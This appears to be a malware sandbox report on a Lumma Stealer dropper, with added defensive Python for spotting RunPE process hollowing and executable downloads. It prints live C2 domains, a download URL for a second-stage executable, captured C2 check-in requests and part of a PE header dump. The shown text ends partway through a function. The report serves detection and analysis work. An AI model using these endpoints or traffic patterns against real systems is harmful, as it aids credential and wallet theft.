Windows Analysis Report
SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
Analysis ID:1500506
MD5:876c12019e3b15fe92841e8d358d4921
SHA1:08e3fb4496270b4ab04d5adee71fefdb670114a1
SHA256:b8738d4888209ef2912d232eafbd13a0017bb62761a9f5d567c3fa0090a09972
Tags:exe

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign process
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe (PID: 6612 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe" MD5: 876C12019E3B15FE92841E8D358D4921)
    • RegAsm.exe (PID: 4184 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 320 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
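The tree above is the textbook RunPE shape: a .NET dropper on the user's Desktop starts the framework utility RegAsm.exe twice with no arguments, which only makes sense if something is about to be written into those processes (the PDB path RunPE-x\ConsoleApp66 recovered from the sample says as much). The Python below is an added example, not Joe Sandbox output, of scoring process-creation events for this shape. The event fields mirror a Sysmon Event ID 1 record; the host-process list and the user-writable directory list are choices made for this example, and the explorer.exe and msiexec.exe events are hypothetical.

```python
import re
from collections import Counter
from dataclasses import dataclass

# .NET framework utilities that RunPE-style loaders commonly pick as the host
# for the injected payload (list chosen for this example, not from the report).
HOLLOW_HOSTS = {
    "regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe",
    "applaunch.exe", "aspnet_compiler.exe", "vbc.exe", "csc.exe",
}
# Directories an unprivileged user can write to; a parent launched from here
# is far more likely to be a dropper than an installer (assumption).
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


@dataclass
class ProcEvent:
    """Subset of a Sysmon Event ID 1 / EDR process-creation record."""
    pid: int
    image: str
    cmdline: str
    parent_pid: int
    parent_image: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def split_cmdline(cmdline: str) -> list[str]:
    """Tokenise a Windows command line: quoted strings or runs of non-space."""
    return re.findall(r'"[^"]*"|\S+', cmdline)


def runpe_indicators(ev: ProcEvent) -> list[str]:
    """Reasons why one process-creation event looks like a RunPE host."""
    reasons = []
    host = basename(ev.image)
    if host not in HOLLOW_HOSTS:
        return reasons
    if len(split_cmdline(ev.cmdline)) == 1:
        reasons.append(f"{host} started with no arguments (legitimate use needs an assembly path)")
    if ev.parent_image.lower().startswith(USER_WRITABLE):
        reasons.append("parent executes from a user-writable directory")
    return reasons


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map child PID -> reasons for every event that trips the RunPE heuristics."""
    spawns = Counter((e.parent_pid, basename(e.image)) for e in events)
    findings = {}
    for e in events:
        reasons = runpe_indicators(e)
        if reasons and spawns[(e.parent_pid, basename(e.image))] > 1:
            reasons.append("same parent spawned this host more than once")
        if reasons:
            findings[e.pid] = reasons
    return findings


# Constructed events: the three processes from the report's tree plus one benign
# RegAsm invocation by an installer (the explorer and msiexec events are hypothetical).
SAMPLE = r"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
SAMPLE_EVENTS = [
    ProcEvent(6612, SAMPLE, f'"{SAMPLE}"', 1234, r"C:\Windows\explorer.exe"),
    ProcEvent(4184, REGASM, f'"{REGASM}"', 6612, SAMPLE),
    ProcEvent(320, REGASM, f'"{REGASM}"', 6612, SAMPLE),
    ProcEvent(5000, REGASM, f'"{REGASM}" "C:\\Program Files\\Vendor\\Interop.dll" /codebase',
              4321, r"C:\Windows\System32\msiexec.exe"),
]

if __name__ == "__main__":
    for pid, why in triage(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(why))
```

Process-creation logs carry neither the CREATE_SUSPENDED flag nor the cross-process writes the sandbox flagged ("Creates a process in suspended mode", "Writes to foreign memory regions"); those need an EDR or ETW-based sensor. Treat this as a cheap first pass over telemetry you already have, then pivot to the memory-write events for the PIDs it returns.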
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["condedqpwqm.shop", "stagedchheiqwo.shop", "stamppreewntnq.shop", "traineiwnqo.shop", "evoliutwoqm.shop", "locatedblsoqp.shop", "miracledzmnqwui.shop", "caffegclasiqwp.shop", "millyscroqwp.shop"], "Build id": "WpM2Co--SUSELL"}
Source: decrypted.memstr | Rule: JoeSecurity_LummaCStealer_2 | Description: Yara detected LummaC Stealer | Author: Joe Security
    No Sigma rule has matched
    Timestamp:2024-08-28T15:29:04.443508+0200
    SID:2055378
    Severity:1
    Source Port:49703
    Destination Port:443
    Protocol:TCP
    Classtype:Domain Observed Used for C2 Detected
    Timestamp:2024-08-28T15:29:06.451728+0200
    SID:2055483
    Severity:1
    Source Port:50347
    Destination Port:53
    Protocol:UDP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:03.784058+0200
    SID:2055377
    Severity:1
    Source Port:57267
    Destination Port:53
    Protocol:UDP
    Classtype:Domain Observed Used for C2 Detected
    Timestamp:2024-08-28T15:29:05.247507+0200
    SID:2049836
    Severity:1
    Source Port:49703
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:05.247507+0200
    SID:2054653
    Severity:1
    Source Port:49703
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:05.751380+0200
    SID:2055489
    Severity:1
    Source Port:49704
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:06.199789+0200
    SID:2049836
    Severity:1
    Source Port:49704
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:06.199789+0200
    SID:2054653
    Severity:1
    Source Port:49704
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:07.638515+0200
    SID:2055493
    Severity:1
    Source Port:49707
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:07.105801+0200
    SID:2049836
    Severity:1
    Source Port:49705
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:07.105801+0200
    SID:2054653
    Severity:1
    Source Port:49705
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:05.253081+0200
    SID:2055479
    Severity:1
    Source Port:64418
    Destination Port:53
    Protocol:UDP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:06.967216+0200
    SID:2055493
    Severity:1
    Source Port:49705
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected


    AV Detection

    Source: miracledzmnqwui.shop | Avira URL Cloud: Label: phishing
    Source: stamppreewntnq.shop | Avira URL Cloud: Label: phishing
    Source: https://traineiwnqo.shop/.% | Avira URL Cloud: Label: malware
    Source: condedqpwqm.shop | Avira URL Cloud: Label: phishing
    Source: https://traineiwnqo.shop/apim | Avira URL Cloud: Label: malware
    Source: https://locatedblsoqp.shop/api | Avira URL Cloud: Label: malware
    Source: https://traineiwnqo.shop/api | Avira URL Cloud: Label: malware
    Source: https://traineiwnqo.shop/&% | Avira URL Cloud: Label: malware
    Source: locatedblsoqp.shop | Avira URL Cloud: Label: phishing
    Source: millyscroqwp.shop | Avira URL Cloud: Label: malware
    Source: https://miracledzmnqwui.shop/api | Avira URL Cloud: Label: malware
    Source: caffegclasiqwp.shop | Avira URL Cloud: Label: malware
    Source: https://traineiwnqo.shop/ | Avira URL Cloud: Label: malware
    Source: stagedchheiqwo.shop | Avira URL Cloud: Label: phishing
    Source: traineiwnqo.shop | Avira URL Cloud: Label: malware
    Source: 3.2.RegAsm.exe.400000.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["condedqpwqm.shop", "stagedchheiqwo.shop", "stamppreewntnq.shop", "traineiwnqo.shop", "evoliutwoqm.shop", "locatedblsoqp.shop", "miracledzmnqwui.shop", "caffegclasiqwp.shop", "millyscroqwp.shop"], "Build id": "WpM2Co--SUSELL"}
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Joe Sandbox ML: detected
    Source: 3.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: caffegclasiqwp.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: stamppreewntnq.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: stagedchheiqwo.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: millyscroqwp.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: evoliutwoqm.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: condedqpwqm.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: traineiwnqo.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: locatedblsoqp.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: miracledzmnqwui.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: lid=%s&j=%s&ver=4.0
    Source: 3.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: TeslaBrowser/5.5
    Source: 3.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: - Screen Resoluton:
    Source: 3.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: - Physical Installed Memory:
    Source: 3.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: Workgroup: -
    Source: 3.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: WpM2Co--SUSELL
    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49703 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49705 version: TLS 1.2
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Users\Administrator\Desktop\RunPE-x\ConsoleApp66\obj\Release\ConsoleApp66.pdb | source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [esi], ax | 3_2_0043406B
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [ebp-14h] | 3_2_0043406B
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 3_2_0040B000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 3_2_004100CB
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [eax+02h], 00000000h | 3_2_00432080
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 3_2_00414160
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [ecx], al | 3_2_00414160
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then push 00000000h | 3_2_00414160
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 3_2_00420120
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], 625B6034h | 3_2_0041C1E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx eax, word ptr [esi+ecx] | 3_2_004309A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp+04h] | 3_2_00436250
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp edx | 3_2_00419A55
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, dword ptr [esp] | 3_2_00419A55
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_0041FA7F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 3_2_0041C219
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 3_2_00429A30
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, dword ptr [esp+04h] | 3_2_0040A2A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov edx, dword ptr [ebp-10h] | 3_2_0041EB5F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov dword ptr [esi+04h], ecx | 3_2_00423300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [ebx], al | 3_2_00423300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [eax], cl | 3_2_00423300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov dword ptr [esp], 00000000h | 3_2_00412BC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edi], al | 3_2_00423BC9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, ebp | 3_2_00406B80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, ebp | 3_2_00406B80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esi] | 3_2_004123AD
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [ecx], al | 3_2_00423C24
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp+18h] | 3_2_00413555
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp byte ptr [edi], 00000000h | 3_2_0040EDDF
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h | 3_2_00418580
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [ecx], al | 3_2_00424D86
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, dword ptr [esp+08h] | 3_2_0041E594
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [ebx], cx | 3_2_00412D9D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then lea eax, dword ptr [esp+20h] | 3_2_0041CE70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx eax, word ptr [ebx] | 3_2_00436E10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edi], dl | 3_2_00423E16
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 3_2_004366B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 3_2_0041AEBD
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 3_2_00420710
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [esi], cx | 3_2_0041A7D8
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 3_2_0041A7D8
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp byte ptr [esi], 00000000h | 3_2_0040EFE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp+48h] | 3_2_0040EFE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_004187E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 3_2_00418F9A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp byte ptr [edi], 00000000h | 3_2_00418F9A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp edx | 3_2_00418F9A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, dword ptr [esp] | 3_2_00418F9A

    Networking

    Source: Network traffic | Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.7:50347 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2055377 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (miracledzmnqwui .shop) : 192.168.2.7:57267 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.7:64418 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.7:49707 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.7:49704 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2055378 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (miracledzmnqwui .shop in TLS SNI) : 192.168.2.7:49703 -> 188.114.96.3:443
    Source: Network traffic | Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.7:49705 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49704 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49705 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49705 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49703 -> 188.114.96.3:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49704 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49703 -> 188.114.96.3:443
    Source: Malware configuration extractor | URLs: condedqpwqm.shop
    Source: Malware configuration extractor | URLs: stagedchheiqwo.shop
    Source: Malware configuration extractor | URLs: stamppreewntnq.shop
    Source: Malware configuration extractor | URLs: traineiwnqo.shop
    Source: Malware configuration extractor | URLs: evoliutwoqm.shop
    Source: Malware configuration extractor | URLs: locatedblsoqp.shop
    Source: Malware configuration extractor | URLs: miracledzmnqwui.shop
    Source: Malware configuration extractor | URLs: caffegclasiqwp.shop
    Source: Malware configuration extractor | URLs: millyscroqwp.shop
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 13:29:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 27 Aug 2024 16:37:44 GMTETag: "43000-620acdc619d20"Accept-Ranges: bytesContent-Length: 274432Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 b3 ec cc 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 03 00 00 c6 00 00 00 00 00 00 30 99 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 04 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 29 a4 03 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 04 00 40 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c a5 03 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 64 03 00 00 10 00 00 00 66 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 55 28 00 00 00 80 03 00 00 2a 00 00 00 6a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c ed 00 00 00 b0 03 00 00 58 00 00 00 94 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 40 42 00 00 00 a0 04 00 00 44 00 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global traffic | HTTP traffic detected: GET /files/u888.exe HTTP/1.1; Host: 147.45.44.131; Connection: Keep-Alive
    Source: Joe Sandbox View | IP Address: 147.45.44.131
    Source: Joe Sandbox View | IP Address: 188.114.97.3
    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: miracledzmnqwui.shop
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: locatedblsoqp.shop
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: traineiwnqo.shop
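The response above is what the "Downloads executable code via HTTP" signature keys on: a Content-Type of application/x-msdos-program and a body that starts with MZ. Reading a few fields of the PE header gives triage facts for free as well: the COFF timestamp in the dump (b3 ec cc 66, i.e. 0x66CCECB3) decodes to 2024-08-26 20:59:31 UTC, about twenty hours before the server's Last-Modified, and the four section headers place the end of .reloc at exactly the declared Content-Length of 274432 bytes. The Python below is an added example, not part of the report: the sample body is re-packed from the field values visible in the dump (data directories zeroed, the remaining bytes of u888.exe not reproduced), and the header dict is constructed from the response line.

```python
import struct
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

MACHINES = {0x14C: "i386", 0x8664: "x86-64", 0x1C0: "arm", 0xAA64: "arm64"}
EXECUTABLE_MIME = {"application/x-msdos-program", "application/x-dosexec",
                   "application/x-msdownload", "application/vnd.microsoft.portable-executable"}


def parse_pe_header(body: bytes):
    """Return basic COFF/optional-header facts if body starts with a PE image, else None."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", body, 0x3C)
    if e_lfanew + 24 > len(body) or body[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
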